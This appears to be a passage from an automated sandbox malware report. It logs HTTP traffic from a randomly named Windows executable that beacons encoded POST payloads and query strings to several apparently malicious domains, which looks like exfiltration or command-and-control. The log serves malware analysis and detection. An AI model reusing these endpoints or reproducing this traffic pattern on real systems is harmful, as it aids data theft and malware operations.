                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k5PoCDpbAx09MgJD%2BL2c7SJK0NBesSqUVSgXPmheNdbhqluvlzo5haagfX6kZFBfwwC8P3%2FGcNlpyojxWIk4wL0bCJ83YQ1e%2FI44V6jMJE3H8y8DfFPM%2BZXqYxHdvJKkkfBy"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e8880985eee4249-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2209&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1744&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 64 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 29 ea 81 c3 6a 25 68 52 b5 52 28 11 b8 07 8e 06 6f e5 4a 6d 9c d8 5b 22 fe 1e 25 15 12 d7 99 37 a3 19 ba ab 5e d7 f6 a3 ad 61 6b 5f 1a 68 0f cf cd 6e 0d 8b 7b c4 5d 6d 37 88 95 ad 6e ce 43 51 22 d6 fb 05 1b 0a 7a 39 33 05 71 9e 0d e9 49 cf c2 ab 72 05 fb a8 b0 89 d7 ce 13 de 44 43 38 43 f4 19 fd cf 94 5b f2 3f 26 2c d9 50 cf 36 08 24 19 ae 92 55 3c 1c de 1a 18 5d 86 2e 2a 1c 27 0e 62 07 1a 4e 19 b2 a4 6f 49 05 61 3f 35 25 36 e4 bc 4f 92 33 3f f5 ee 2b 08 bc cf 00 38 85 71 1c 8b 8b cb 2a 69 18 8a 3e 45 68 63 52 78 2c 09 ff 22 86 70 de 44 38 7f f9 05 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 2a 59 1a 36 06 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: d5LN0Dw)j%hRR(oJm["%7^ak_hn{]m7nCQ"z93qIrDC8C[?&,P6$U<].*'bNoIa?5%6O3?+8q*i>EhcRx,"pD8b*Y60


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                4192.168.2.849717172.67.213.249806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:27:59.789674997 CET452OUTGET /vfw3/?ynlT=rqg4sojPN1HzbyOgPnJNE4SyCm0Y3+McauZgTy6bg/7NgADr7OmLN934TwPzSFzjuedcHscZgYNpl4RBVJqUXfpXxUIp7SdBR5fyivcNmDQrGMikN20eFfd6B8gSgv5TSw==&BZcp=FxLxsNCx3xt HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.masterqq.pro
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Nov 26, 2024 09:28:01.112854004 CET1039INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 26 Nov 2024 08:28:00 GMT
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xOBr9xxZ3xCfGlU%2BXwNn6vNmEkGHbIk3Qdtung1g%2BuzAIT74AdTg%2FgJp14rCnGFI9tljKUS2vopOo5tEV0hlz9IFgBSyovgxNmS7AJbSZR1ye1f8MrT1FoLmpR2JJreTh%2F%2F4"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e8880a8ff2542da-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2152&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=452&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 31 30 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 61 73 74 65 72 71 71 2e 70 72 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 106<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.masterqq.pro Port 80</address></body></html>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                5192.168.2.84971813.248.169.48806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:28:06.803306103 CET704OUTPOST /ve8l/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.hasan.cloud
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.hasan.cloud
                                                                                Referer: http://www.hasan.cloud/ve8l/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 37 41 72 59 4f 33 37 4b 64 4e 56 2f 74 7a 54 5a 4d 79 33 59 64 30 5a 62 32 64 5a 30 36 37 48 38 56 44 62 76 56 33 53 47 5a 38 4e 54 6b 78 49 2b 41 4a 77 63 44 6a 47 2b 62 75 44 38 51 4d 4f 6a 49 43 76 4a 44 56 33 56 46 67 75 62 4d 4c 4b 63 72 76 67 74 74 33 6a 68 50 35 56 33 67 39 71 4e 72 68 4a 59 58 51 72 4f 76 34 31 6f 55 61 7a 41 4f 2b 4d 34 31 4a 52 4b 73 39 6f 7a 44 51 4c 77 76 46 58 71 33 4d 54 76 2f 56 72 69 53 41 7a 71 58 78 6e 69 73 4d 45 58 7a 4d 70 38 36 69 61 63 76 74 42 31 71 79 58 6d 77 64 44 37 31 2b 61 76 76 74 57 58 34 44 49 79 44 30 71 4c 51 73 2f 2b 70 4b 67 34 41 36 38 3d
                                                                                Data Ascii: ynlT=7ArYO37KdNV/tzTZMy3Yd0Zb2dZ067H8VDbvV3SGZ8NTkxI+AJwcDjG+buD8QMOjICvJDV3VFgubMLKcrvgtt3jhP5V3g9qNrhJYXQrOv41oUazAO+M41JRKs9ozDQLwvFXq3MTv/VriSAzqXxnisMEXzMp86iacvtB1qyXmwdD71+avvtWX4DIyD0qLQs/+pKg4A68=


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                6192.168.2.84971913.248.169.48806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:28:09.477768898 CET724OUTPOST /ve8l/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.hasan.cloud
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.hasan.cloud
                                                                                Referer: http://www.hasan.cloud/ve8l/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 37 41 72 59 4f 33 37 4b 64 4e 56 2f 73 51 4c 5a 41 7a 33 59 63 55 5a 55 35 39 5a 30 6a 72 48 43 56 44 6e 76 56 32 6d 73 5a 75 70 54 6b 52 34 2b 42 4d 63 63 41 6a 47 2b 54 4f 44 35 64 73 4f 6f 49 43 6a 42 44 58 54 56 46 6a 53 62 4d 4a 69 63 71 59 55 75 75 48 6a 6a 41 5a 56 31 39 74 71 4e 72 68 4a 59 58 51 4f 70 76 34 64 6f 55 76 6a 41 4f 63 30 33 72 5a 52 4a 38 4e 6f 7a 4f 77 4c 30 76 46 58 55 33 4a 79 4b 2f 58 6a 69 53 46 58 71 55 6a 50 39 6d 4d 45 52 33 4d 6f 56 71 58 7a 53 32 74 78 71 68 68 33 36 38 37 62 76 30 49 72 46 31 50 65 52 37 44 67 5a 44 33 43 39 56 62 69 57 7a 70 77 49 65 74 70 66 6c 72 4c 46 4d 71 71 62 2b 36 62 54 54 36 31 6f 30 54 75 41
                                                                                Data Ascii: ynlT=7ArYO37KdNV/sQLZAz3YcUZU59Z0jrHCVDnvV2msZupTkR4+BMccAjG+TOD5dsOoICjBDXTVFjSbMJicqYUuuHjjAZV19tqNrhJYXQOpv4doUvjAOc03rZRJ8NozOwL0vFXU3JyK/XjiSFXqUjP9mMER3MoVqXzS2txqhh3687bv0IrF1PeR7DgZD3C9VbiWzpwIetpflrLFMqqb+6bTT61o0TuA


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                7192.168.2.84972013.248.169.48806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:28:12.138510942 CET1741OUTPOST /ve8l/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.hasan.cloud
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.hasan.cloud
                                                                                Referer: http://www.hasan.cloud/ve8l/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 37 41 72 59 4f 33 37 4b 64 4e 56 2f 73 51 4c 5a 41 7a 33 59 63 55 5a 55 35 39 5a 30 6a 72 48 43 56 44 6e 76 56 32 6d 73 5a 75 68 54 6b 43 77 2b 42 76 6b 63 42 6a 47 2b 51 4f 44 34 64 73 4f 31 49 43 37 2f 44 58 65 6f 46 6d 65 62 4f 6f 43 63 74 70 55 75 31 33 6a 6a 59 70 56 6f 67 39 71 55 72 68 35 63 58 51 2b 70 76 34 64 6f 55 75 54 41 5a 65 4d 33 70 5a 52 4b 73 39 6f 2f 44 51 4b 72 76 46 65 76 33 4a 2b 30 34 6e 44 69 54 6a 33 71 53 51 6e 39 71 4d 45 54 36 73 6f 4e 71 58 33 5a 32 74 73 54 68 67 54 41 38 38 2f 76 31 38 6d 34 79 74 43 4b 6f 51 49 76 50 31 57 61 51 5a 65 6d 78 6f 77 37 44 39 56 51 68 36 36 6b 50 5a 69 48 2b 49 58 66 42 75 55 35 79 6d 36 4d 72 32 50 75 50 77 5a 59 57 6d 6d 54 31 39 79 2b 70 7a 30 4d 32 53 6c 6a 7a 33 69 38 41 42 66 4c 68 45 69 78 35 4e 30 75 4f 36 49 52 4d 49 47 6f 31 37 35 54 2f 4b 66 6b 4f 32 4b 56 48 4b 57 71 58 53 2b 44 57 51 45 56 59 2b 69 6c 45 35 54 4c 31 62 4c 48 72 6e 38 76 71 2f 6a 73 46 33 49 50 61 5a 44 34 42 55 76 2f 47 72 62 47 2f 5a 37 2b 7a [TRUNCATED]
                                                                                Data Ascii: ynlT=7ArYO37KdNV/sQLZAz3YcUZU59Z0jrHCVDnvV2msZuhTkCw+BvkcBjG+QOD4dsO1IC7/DXeoFmebOoCctpUu13jjYpVog9qUrh5cXQ+pv4doUuTAZeM3pZRKs9o/DQKrvFev3J+04nDiTj3qSQn9qMET6soNqX3Z2tsThgTA88/v18m4ytCKoQIvP1WaQZemxow7D9VQh66kPZiH+IXfBuU5ym6Mr2PuPwZYWmmT19y+pz0M2Sljz3i8ABfLhEix5N0uO6IRMIGo175T/KfkO2KVHKWqXS+DWQEVY+ilE5TL1bLHrn8vq/jsF3IPaZD4BUv/GrbG/Z7+zWrRT6k3ttaZHhOVjGgTd/CXm75GJR0vwcxBCvJtvPYjLgUSuJCxnqTJtqFwkYO8TxrnS4/5r+lnw8QuhiK9WqLjDKWnKPwXUYfPdfyK5Z74YMILSAp3/mDRrBXzz9F1Z1w/UPys5pj+8A5LDCb9Xnrs2Qabs4iqjnyA5C7l1nlRDvM+1OJqSpSwxHRPOKOS1ZCU2pMpSAxCD/BVwVvGteKyO5VThVpHRgGYFsvZUJErtUdsHuBuWEOGEEYTPlI8muCf4b0V+0XNLowZzwKrM5kmOmpQQkIl+ge6GhuELbGlvNgj9kRKKmt3+uXPU75gamQw4HKARWllqUXLeOqRGB2GZ38lffj8Nuw3rEYp7YaM6GDxe0RV18wxeT31pag5qyIT1N1qd9fEU5uLqTuEXUKvMUnLMn1Sz7WJi5Igjk82fanu+j6CG2V1d0u4VL8KUJ76aCUfwRUvrPQNmwYgg4mtee++u/rXI7fxoDBbbyipLOVZggeaToUWjDSO/i3Geuclm+EaQFxFZ0BNMsey6o4/4Z6GCuZeCvLRyTdRIY8wDis4fBpNKqoK6DUlVFHlE2TLIRfqc14+SrVfWqcqwOOR310EsvlyAcHHxtsw2aPpXcle2lgYbIw3L0ynX4D9ODAHztP0ibv90axVW0LWQvq6pnzOI1/ybWp [TRUNCATED]


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                8192.168.2.84972113.248.169.48806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:28:14.790781021 CET451OUTGET /ve8l/?BZcp=FxLxsNCx3xt&ynlT=2CD4NCzEaM98tRH2NSLAESNB0KJGqITNZhOfTEabPOsm5z4GKvQfPi2Ic9iPSKmuH0LkAH7bJGGmIcrctbsX21XyN7dSlYagiwJlQTi+mtxAaezlBuk4gZte6sxMNB2v+Q== HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.hasan.cloud
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Nov 26, 2024 09:28:15.929868937 CET409INHTTP/1.1 200 OK
                                                                                Server: openresty
                                                                                Date: Tue, 26 Nov 2024 08:28:15 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 269
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 42 5a 63 70 3d 46 78 4c 78 73 4e 43 78 33 78 74 26 79 6e 6c 54 3d 32 43 44 34 4e 43 7a 45 61 4d 39 38 74 52 48 32 4e 53 4c 41 45 53 4e 42 30 4b 4a 47 71 49 54 4e 5a 68 4f 66 54 45 61 62 50 4f 73 6d 35 7a 34 47 4b 76 51 66 50 69 32 49 63 39 69 50 53 4b 6d 75 48 30 4c 6b 41 48 37 62 4a 47 47 6d 49 63 72 63 74 62 73 58 32 31 58 79 4e 37 64 53 6c 59 61 67 69 77 4a 6c 51 54 69 2b 6d 74 78 41 61 65 7a 6c 42 75 6b 34 67 5a 74 65 36 73 78 4d 4e 42 32 76 2b 51 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?BZcp=FxLxsNCx3xt&ynlT=2CD4NCzEaM98tRH2NSLAESNB0KJGqITNZhOfTEabPOsm5z4GKvQfPi2Ic9iPSKmuH0LkAH7bJGGmIcrctbsX21XyN7dSlYagiwJlQTi+mtxAaezlBuk4gZte6sxMNB2v+Q=="}</script></head></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                9192.168.2.849722173.0.157.187806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:28:21.716492891 CET695OUTPOST /5m3m/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.0be.info
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.0be.info
                                                                                Referer: http://www.0be.info/5m3m/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 68 63 59 6f 43 4c 61 6c 43 6c 4e 49 6a 63 52 6e 5a 39 35 4e 42 6b 32 46 55 42 38 55 6e 65 7a 79 37 50 35 76 79 4f 4e 6f 55 4a 77 34 63 48 4e 65 4b 61 4e 67 75 54 54 46 54 71 4f 48 38 4a 6e 59 65 58 43 33 67 57 71 6a 36 73 50 4b 4f 4b 77 2b 4a 43 31 7a 6b 42 57 6b 54 35 66 72 68 53 54 2f 79 41 64 30 53 46 75 63 76 64 38 56 42 68 57 66 77 68 50 70 58 6b 69 51 72 69 59 79 65 52 64 55 65 6f 71 51 32 6e 4a 35 6c 43 66 58 4e 79 6f 47 36 42 73 63 70 43 6e 4c 6c 2b 69 4c 37 73 4d 55 46 47 58 59 45 66 74 4c 39 52 65 48 6a 48 32 6f 45 35 4b 6d 6c 37 37 39 43 47 4d 63 78 30 74 34 4c 6a 61 2f 61 78 4d 3d
                                                                                Data Ascii: ynlT=hcYoCLalClNIjcRnZ95NBk2FUB8Unezy7P5vyONoUJw4cHNeKaNguTTFTqOH8JnYeXC3gWqj6sPKOKw+JC1zkBWkT5frhST/yAd0SFucvd8VBhWfwhPpXkiQriYyeRdUeoqQ2nJ5lCfXNyoG6BscpCnLl+iL7sMUFGXYEftL9ReHjH2oE5Kml779CGMcx0t4Lja/axM=
                                                                                Nov 26, 2024 09:28:22.940148115 CET262INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Tue, 26 Nov 2024 08:28:22 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Cache-Control: no-cache, private
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 32 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 f3 c9 cc cb 56 c8 2c 56 48 ad 28 c8 2c 4a 4d 01 00 e1 b0 96 c8 0f 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 23V,VH(,JM0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                10192.168.2.849723173.0.157.187806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:28:24.373871088 CET715OUTPOST /5m3m/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.0be.info
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.0be.info
                                                                                Referer: http://www.0be.info/5m3m/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 68 63 59 6f 43 4c 61 6c 43 6c 4e 49 6a 38 42 6e 61 65 68 4e 51 30 32 47 58 42 38 55 6f 2b 79 35 37 50 46 76 79 50 34 7a 58 37 55 34 63 6d 64 65 59 4f 5a 67 69 7a 54 46 4c 36 4f 4f 34 4a 6e 48 65 58 50 4b 67 58 6d 6a 36 73 62 4b 4f 4a 6b 2b 4a 7a 31 77 6c 52 57 6d 66 5a 66 6c 75 79 54 2f 79 41 64 30 53 42 2b 36 76 64 6b 56 42 52 6d 66 77 41 50 6d 4a 55 69 54 6d 79 59 79 55 78 64 51 65 6f 71 75 32 69 68 58 6c 41 6e 58 4e 32 73 47 35 55 41 44 79 79 6e 4a 37 4f 69 61 71 76 56 41 4a 52 4c 30 5a 2f 5a 56 38 52 69 44 6d 78 48 43 65 62 43 67 6d 37 54 57 43 46 6b 71 30 44 77 51 52 41 4b 50 45 6d 61 66 35 6a 67 47 6f 69 72 75 70 62 39 68 61 71 34 43 48 4b 39 53
                                                                                Data Ascii: ynlT=hcYoCLalClNIj8BnaehNQ02GXB8Uo+y57PFvyP4zX7U4cmdeYOZgizTFL6OO4JnHeXPKgXmj6sbKOJk+Jz1wlRWmfZfluyT/yAd0SB+6vdkVBRmfwAPmJUiTmyYyUxdQeoqu2ihXlAnXN2sG5UADyynJ7OiaqvVAJRL0Z/ZV8RiDmxHCebCgm7TWCFkq0DwQRAKPEmaf5jgGoirupb9haq4CHK9S
                                                                                Nov 26, 2024 09:28:25.600883007 CET262INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Tue, 26 Nov 2024 08:28:25 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Cache-Control: no-cache, private
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 32 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 f3 c9 cc cb 56 c8 2c 56 48 ad 28 c8 2c 4a 4d 01 00 e1 b0 96 c8 0f 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 23V,VH(,JM0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                11192.168.2.849724173.0.157.187806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:28:27.030558109 CET1732OUTPOST /5m3m/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.0be.info
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.0be.info
                                                                                Referer: http://www.0be.info/5m3m/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 68 63 59 6f 43 4c 61 6c 43 6c 4e 49 6a 38 42 6e 61 65 68 4e 51 30 32 47 58 42 38 55 6f 2b 79 35 37 50 46 76 79 50 34 7a 58 37 63 34 63 57 42 65 4b 38 78 67 6a 7a 54 46 56 71 4f 4c 34 4a 6d 62 65 58 48 4f 67 58 62 63 36 75 6a 4b 50 70 34 2b 41 68 64 77 73 52 57 6d 58 35 66 6f 68 53 53 6e 79 45 41 63 53 46 69 36 76 64 6b 56 42 53 75 66 35 78 50 6d 4c 55 69 51 72 69 59 45 65 52 63 46 65 73 47 59 32 69 74 70 6b 77 48 58 4d 53 49 47 2f 6d 59 44 2b 79 6e 50 36 4f 6a 48 71 76 70 32 4a 56 54 65 5a 39 35 7a 38 53 79 44 6b 6e 36 55 47 70 57 43 6c 34 76 44 46 31 34 50 37 51 63 33 62 41 4f 50 62 6c 79 68 74 32 38 30 70 44 66 5a 39 63 6b 62 4e 75 56 56 58 75 49 2f 47 51 64 36 67 6e 43 51 6f 47 6f 4a 30 2f 6d 50 72 65 51 79 43 56 6c 79 61 35 43 78 51 65 4e 75 47 55 4d 45 57 53 4b 4e 42 53 79 70 63 67 57 74 6c 76 43 6f 47 68 5a 4c 78 72 41 4b 53 36 52 57 38 59 33 7a 4f 41 79 77 4e 30 4e 6d 74 55 68 45 64 6c 77 45 33 5a 32 6f 6c 47 6a 50 54 68 70 56 37 4c 78 34 45 59 76 5a 35 74 36 66 58 71 65 35 33 [TRUNCATED]
                                                                                Data Ascii: ynlT=hcYoCLalClNIj8BnaehNQ02GXB8Uo+y57PFvyP4zX7c4cWBeK8xgjzTFVqOL4JmbeXHOgXbc6ujKPp4+AhdwsRWmX5fohSSnyEAcSFi6vdkVBSuf5xPmLUiQriYEeRcFesGY2itpkwHXMSIG/mYD+ynP6OjHqvp2JVTeZ95z8SyDkn6UGpWCl4vDF14P7Qc3bAOPblyht280pDfZ9ckbNuVVXuI/GQd6gnCQoGoJ0/mPreQyCVlya5CxQeNuGUMEWSKNBSypcgWtlvCoGhZLxrAKS6RW8Y3zOAywN0NmtUhEdlwE3Z2olGjPThpV7Lx4EYvZ5t6fXqe53XWJo210wYto8+EbsiyP07PZpbT896Djq9aPQoV5mz+V+E1KwHbhOep+sPa/mz7Iv1f4GDf1AyYQFe0pFZf6CuKjmNl229PDBE8kjxDdKGxaw/n/octG706p2ZRhnwap+/DCPYj8haykv0Aw+NH2Q/z3Jy3O6GZv0g8CsNgA9y9gxbLUtWovJwWX7A5sDKybY0DJkI+HXmsAnu2ugjJn8gLBkp9m39t4w//jbHVIt1tcGsthlVhfbOCHCzuoeXcAxB5QWsWTEXURr8ADSWq8mNQz1RdZMLrDunjEsNKt9+VphUVtHMPePsgICuoxbcBdq9gjkcsm3zkEApwW+8ID6mrMBIBRK7jLpw61cF9V51JrwirsoPJX4XkOp3VUWw2/+y0aZ4a/Vtq9fZAb/OVLjbZPReYztvp1sv+qgHIK/OCKtdKrPLcWwG52D0SUBuzce3bVKGQrZsAKcZrj0o3slkqyq++fs6T+3GDPfb/QU4HXMfcLtgD2V3qlEvT1/IDgvLVnzAB9VXSyyQThp4+SPhAmh8b8cZKUeNB+rdmmb0s92oHAi6ZR47Y8ViApgSdOZdmMaQVhM5kvGhteadMRXpwxkTSSLzSWXhwfaKuIlz84U+rnLRtA+Zdgls9WF0vrG8xJ3lgPq2737mn6QMawa4OK0yFhYONkyR2 [TRUNCATED]
                                                                                Nov 26, 2024 09:28:28.400685072 CET262INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Tue, 26 Nov 2024 08:28:28 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
